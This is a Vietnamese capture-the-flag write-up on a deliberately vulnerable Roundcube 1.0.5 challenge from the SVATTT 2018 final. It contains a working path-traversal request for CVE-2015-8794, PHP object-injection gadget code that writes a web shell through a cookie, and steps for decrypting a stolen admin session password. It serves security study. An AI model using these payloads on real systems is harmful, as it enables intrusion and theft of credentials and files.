SVATTT final 2018 - roundcube mail

Winter is comming

Mô tả

Roundcube 1.0.5 có 3 lỗi
Tài khoản: guest/guest
Thư mục web /opt/lampp/htdocs
Source: part1, part2

Ý tưởng

Lỗi 1: CVE-2015-8794
Lỗi 2: PHP Object Injection (cách 2 - cách noob )
Lỗi 3: Đăng nhập admin

Tâm tư của tác giả

Mặc dù theo dòng sự kiện scandal đang nóng hỏi trên facebook nhưng bài này chỉ nói về kỹ thuật không có kích động thù địch gì cả. Tôi writeup bài này sau khi cuộc thi kết thúc và cũng là đội thua cuộc (#2) nên chẳng muốn nói gì hơn là ngậm ngùi :(
Đề bài không có kỹ thuật mới và không khó nhưng vẫn là dạng bài hay mặc dù 8 tiếng trong cuộc thi attack/defense không đủ để thí sinh làm tất cả các lỗi mà phải bận tâm vào nhiều thứ khác. Nếu có thể gia tăng thời gian lên 2 ngày thì hay quá !!!

Chi tiết

Lỗi 1: CVE-2015-8794

Đọc file CHANGELOG ta tìm được version của roundcube là 1.0.5. Có rất nhiều cve nhưng version này khá cũ từ 2015 nên có vẻ CVE-2015-X sẽ hợp lý hơn

83<?php //program/steps/addressbook/photo.inc
84// deliver alt image
85if (!$data && ($alt_img = rcube_utils::get_input_value('_alt', rcube_utils::INPUT_GPC)) && is_file($alt_img)) {
86  $data = file_get_contents($alt_img);
87}
88

Mục addressbook ở /?_task=addressbook nhận request tham số _alt mà không filter dữ liệu đầu vào, dẫn đến đọc bất kì file nào thông qua file_get_contents Lỗi này đơn giản nên tôi không nói kỹ, payload khai thác như sau:

GET /?_task=addressbook&_photo=21542765594039404100&_source=collected&_action=photo&_alt=/opt/lampp/htdocs/config/config.inc.php HTTP/1.1
Host: proxy.svattt2018.com
Cookie: roundcube_sessid=9gi796bomddm9otl585hssa1t5; XDEBUG_SESSION=1; roundcube_sessauth=S9184f9910452f5bb647294adcfacbd34bc8aa5d2; language=en_US
Connection: close

Lỗi 2: PHP Object Injection

Tôi phát hiện lỗi này bằng cách tìm theo keyword unserialize, challenge sử dụng rất nhiều hàm nguy hiểm nhưng yêu cầu cần phải có gadget để thực thi được payload đó là hàm _destruct và _wakeup. Tiếp tục tìm 2 keyword đó thì tìm được 2 vị trí đáng chú ý.

49<?php //program/lib/Roundcube/rcube_image.php
50function __destruct()
51{
52  echo file_get_contents("<img src='data:image/jpeg;base64,'".base64_encode($this->image_file)." />");
53}
54
14<?php //plugins/auto_address/auto_address.php
15public function __destruct()
16{
17  if (isset($this->_fn_close)) {
18    call_user_func($this->_fn_close);
19  }
20}
21

Tôi mất xíu thời gian để xây dựng payload cho gadget file rcube_image.php nhưng rồi nhận ra dòng code này luôn luôn sai và không bao giờ được chạy đúng Với gadget 2 ta có thể gọi bất kì function nào mà không dùng parameter. Có vẻ không có function có thể exploit mà không cần truyền param cả, hoặc là có mà bạn phát hiện thì hãy comment phía dưới để chỉ tôi biết. Nếu đây là nơi mà tác giả dẫn dắt ta đến thì có vẻ sẽ có 1 function nào đó đã được định nghĩa trước để ta exploit. Tiếp tục tìm kiếm.

106<?php //plugins/auto_address/auto_address.php
107public function log(){
108  try{
109    file_put_contents($this->logfile,$this->content);
110  }catch (Exception $e){
111    echo "[Auto_address]: Can't log!";
112  }
113}
114

À, lên shell được rồi, chỉ cần thay đổi được biến logfile, content và _fn_close là xong. Quay trở lại vị trí sử dụng hàm unserialize để áp payload vào.

89<?php //plugins/rememberme/rememberme.php
90function authenticate($args)
91{
92	...
93	// use only-cookie mechanic to identify the user.
94  $user_info = unserialize(base64_decode($_COOKIE[$this->cookie_name]));
95  ...
96	return $args;
97}
98

Đây là function chức năng remember. Khi login mà check vào ô remember thì một số thông tin cần thiết sẽ được serialize và lưu vào trình duyệt biến _pt. Khi trình duyệt tắt và mở lại, dữ liệu này sẽ được gửi lên server trong trường cookie và mọi session được phục hồi như lúc chưa tắt trình duyệt. Vậy nếu ta áp payload ở đây thì sẽ được unserialize dữ liệu đó. Dữ kiện đã đầy đủ, xây dựng payload thôi. Đến đây thế giới như chia làm 2, build payload rất dễ, vài dòng code thôi các bạn có thể tự build. Nhưng tôi muốn các bạn biết 1 cách khác, khó hơn, try hard hơn và … điên khùng hơn Tóm tắt các bước là:
- Debug để tìm plugin rememberme load ở vị trí nào trong framework
- Object auto_address không thể serialize vì nó là PDO object. Dùng trick để có thể serialize
- Biến logfile, content, _fn_close là private. Sử dụng php reflection để set giá trị

index.php:42			$RCMAIL = rcmail::get_instance($GLOBALS['env']);
rcmail.php:77			self::$instance->startup();
rcmail.php:127			this->plugins->load_plugins((array)$this->config->get('plugins', array()), array('filesystem_attachments', 'jqueryui'));
rcube_plugin_api.php:139  $this->load_plugin($plugin_name); // $plugin_name="auto_addrses"

Quá trình debug như trên, và tôi thêm 1 đoạn code để bypass những bước liệt kê ở trên ở dòng 200 trong function load_plugin

 1<?php
 2if ($plugin_name == "auto_address"){
 3  $myClassReflection = new ReflectionClass(get_class($plugin));
 4  //
 5  $logfile = $myClassReflection->getProperty('logfile');
 6  $logfile->setAccessible(true);
 7  $logfile->setValue($plugin, "/opt/lampp/htdocs/shell.php");
 8  //
 9  $content = $myClassReflection->getProperty('content');
10  $content->setAccessible(true);
11  $content->setValue($plugin, "<?php echo 'Lên shell rồi nhé !!!';");
12  //
13  $_fn_close = $myClassReflection->getProperty('_fn_close');
14  $_fn_close->setAccessible(true);
15  $_fn_close->setValue($plugin, array('auto_address', 'log'));
16  //
17  $x = serialize($plugin);
18  echo base64_encode($x);
19}
20

Và thêm function __sleep() để object có thể serialize vào class auto_address

1<?php
2function __sleep(){
3	return array('logfile', 'content', '_fn_close');
4}
5

Làm xong lỗi này tôi cảm thấy challenge này hay nhưng chợt nhận ra mình sai sai ở đâu đó. Khuyến nghị không áp dụng ở nhà vì nó quá điên khùng và mất thời gian

Lỗi 3: Đăng nhập admin

Audit source hay vào mysql dễ dàng nhận thấy có 2 user là guest và mailadmin, tác giả cho đăng nhập guest thì đoán flow của bài này là đăng nhập admin. Với tài khoản mysql cho trong file config.inc.php $config['db_dsnw'] = 'mysql://roundcube:asdf%[email protected]/roundcube'; tôi đăng nhập lấy được session của bot đăng nhập admin trong bảng session

$ echo bGFuZ3VhZ2V8czo1OiJlbl9VUyI7c2tpbnxzOjY6Im1hYm9sYSI7aW1hcF9uYW1lc3BhY2V8YTo0OntzOjg6InBlcnNvbmFsIjthOjE6e2k6MDthOjI6e2k6MDtzOjA6IiI7aToxO3M6MToiLiI7fX1zOjU6Im90aGVyIjtOO3M6Njoic2hhcmVkIjtOO3M6NjoicHJlZml4IjtzOjA6IiI7fWltYXBfZGVsaW1pdGVyfHM6MToiLiI7dXNlcl9pZHxzOjE6IjIiO3VzZXJuYW1lfHM6NToiZ3Vlc3QiO3N0b3JhZ2VfaG9zdHxzOjk6ImxvY2FsaG9zdCI7c3RvcmFnZV9wb3J0fGk6MTQzO3N0b3JhZ2Vfc3NsfE47cGFzc3dvcmR8czoyNDoiY3BqemgwUHU4b0ljSWRKb2VTWkUyZz09Ijtsb2dpbl90aW1lfGk6MTU0Mjc3NDI2Nzt0YXNrfHM6NDoibWFpbCI7aW1hcF9ob3N0fHM6OToibG9jYWxob3N0IjttYm94fHM6NToiSU5CT1giO3BhZ2V8aToxO3NvcnRfY29sfHM6MDoiIjtzb3J0X29yZGVyfHM6NDoiREVTQyI7U1RPUkFHRV9USFJFQUR8YTozOntpOjA7czoxMDoiUkVGRVJFTkNFUyI7aToxO3M6NDoiUkVGUyI7aToyO3M6MTQ6Ik9SREVSRURTVUJKRUNUIjt9U1RPUkFHRV9RVU9UQXxiOjA7U1RPUkFHRV9MSVNULUVYVEVOREVEfGI6MTtsaXN0X2F0dHJpYnxhOjQ6e3M6NDoibmFtZSI7czo4OiJtZXNzYWdlcyI7czoyOiJpZCI7czoxMToibWVzc2FnZWxpc3QiO3M6NToiY2xhc3MiO3M6NDg6InJlY29yZHMtdGFibGUgbWVzc2FnZWxpc3Qgc29ydGhlYWRlciBmaXhlZGhlYWRlciI7czoxNToib3B0aW9uc21lbnVpY29uIjtzOjQ6InRydWUiO31za2luX3BhdGh8czoxMToic2tpbnMvbGFycnkiO3Vuc2Vlbl9jb3VudHxhOjI6e3M6NToiSU5CT1giO2k6MDtzOjQ6IlNlbnQiO2k6MDt9 | base64 -d
> language|s:5:"en_US";skin|s:6:"mabola";imap_namespace|a:4:{s:8:"personal";a:1:{i:0;a:2:{i:0;s:0:"";i:1;s:1:".";}}s:5:"other";N;s:6:"shared";N;s:6:"prefix";s:0:"";}imap_delimiter|s:1:".";user_id|s:1:"1";username|s:9:"mailadmin";storage_host|s:9:"localhost";storage_port|i:143;storage_ssl|N;password|s:32:"VXcHgXdbjUag0qskGVDSRWl1jAmgZvCV";login_time|i:1542768863;timezone|s:16:"America/New_York";task|s:4:"mail";imap_host|s:9:"localhost";mbox|s:5:"INBOX";page|i:1;sort_col|s:7:"subject";sort_order|s:4:"DESC";STORAGE_THREAD|a:3:{i:0;s:10:"REFERENCES";i:1;s:4:"REFS";i:2;s:14:"ORDEREDSUBJECT";}STORAGE_QUOTA|b:0;STORAGE_LIST-EXTENDED|b:1;list_attrib|a:5:{s:4:"name";s:8:"messages";s:2:"id";s:11:"messagelist";s:5:"class";s:48:"records-table messagelist sortheader fixedheader";s:15:"optionsmenuicon";s:4:"true";s:7:"columns";a:8:{i:0;s:7:"threads";i:1;s:7:"subject";i:2;s:6:"status";i:3;s:6:"fromto";i:4;s:4:"date";i:5;s:4:"size";i:6;s:4:"flag";i:7;s:10:"attachment";}}skin_path|s:11:"skins/larry";folders|a:1:{s:5:"INBOX";a:2:{s:3:"cnt";i:0;s:6:"maxuid";i:0;}}unseen_count|a:1:{s:5:"INBOX";i:0;}

Trong đây có chứa password admin là VXcHgXdbjUag0qskGVDSRWl1jAmgZvCV nhưng có vẻ bị mã hóa rồi. Bước tiếp là tìm function decrypt trong roundcube để giải mã

840<?php //program/lib/Roundcube/rcube.php
841public function decrypt($cipher, $key = 'des_key', $base64 = true)
842{
843  if (!$cipher) {
844    return '';
845  }
846
847  $cipher = $base64 ? base64_decode($cipher) : $cipher;
848
849  if (function_exists('mcrypt_module_open') &&
850    ($td = mcrypt_module_open(MCRYPT_TripleDES, "", MCRYPT_MODE_CBC, ""))
851  ) {
852    $iv_size = mcrypt_enc_get_iv_size($td);
853    $iv = substr($cipher, 0, $iv_size);
854
855    // session corruption? (#1485970)
856    if (strlen($iv) < $iv_size) {
857      return '';
858    }
859
860    $cipher = substr($cipher, $iv_size);
861    mcrypt_generic_init($td, $this->config->get_crypto_key($key), $iv);
862    $clear = mdecrypt_generic($td, $cipher);
863    mcrypt_generic_deinit($td);
864    mcrypt_module_close($td);
865  }
866  else {
867    @include_once 'des.inc';
868
869    if (function_exists('des')) {
870      $des_iv_size = 8;
871      $iv = substr($cipher, 0, $des_iv_size);
872      $cipher = substr($cipher, $des_iv_size);
873      $clear = des($this->config->get_crypto_key($key), $cipher, 0, 1, $iv);
874    }
875    else {
876      self::raise_error(array(
877        'code' => 500, 'type' => 'php',
878        'file' => __FILE__, 'line' => __LINE__,
879        'message' => "Could not perform decryption; make sure Mcrypt is installed or lib/des.inc is available"
880        ), true, true);
881    }
882  }
883
884  /*-
885   * Trim PHP's padding and the canary byte; see note in
886   * rcube::encrypt() and http://php.net/mcrypt_generic#68082
887   */
888  $clear = substr(rtrim($clear, "\0"), 0, -1);
889
890  return $clear;
891}
892

Viết lại 1 function tương tự ở bên dưới file đó là xong.

 1<?php
 2function decrypt($cipher='VXcHgXdbjUag0qskGVDSRWl1jAmgZvCV', $key = 'HLxz-oU8UnnTY-es5Kc_%$f!', $base64 = true)
 3{
 4  $cipher = base64_decode($cipher);
 5
 6  if (function_exists('mcrypt_module_open') &&
 7    ($td = mcrypt_module_open(MCRYPT_TripleDES, "", MCRYPT_MODE_CBC, ""))
 8  ) {
 9    $iv_size = mcrypt_enc_get_iv_size($td);
10    $iv = substr($cipher, 0, $iv_size);
11
12    // session corruption? (#1485970)
13    if (strlen($iv) < $iv_size) {
14      return '';
15    }
16
17    $cipher = substr($cipher, $iv_size);
18    mcrypt_generic_init($td, $key, $iv);
19    $clear = mdecrypt_generic($td, $cipher);
20    mcrypt_generic_deinit($td);
21    mcrypt_module_close($td);
22  }
23  $clear = substr(rtrim($clear, "\0"), 0, -1);
24  echo $clear;
25}
26

Vậy lấy được password admin, đăng nhập admin sẽ được flag vì trong file index.php có đoạn code sau:

1<?php //index.php
2if($_SESSION['username']==='mailadmin'){
3  $OUTPUT->show_message($RCMAIL->config->get('flag'));
4}
5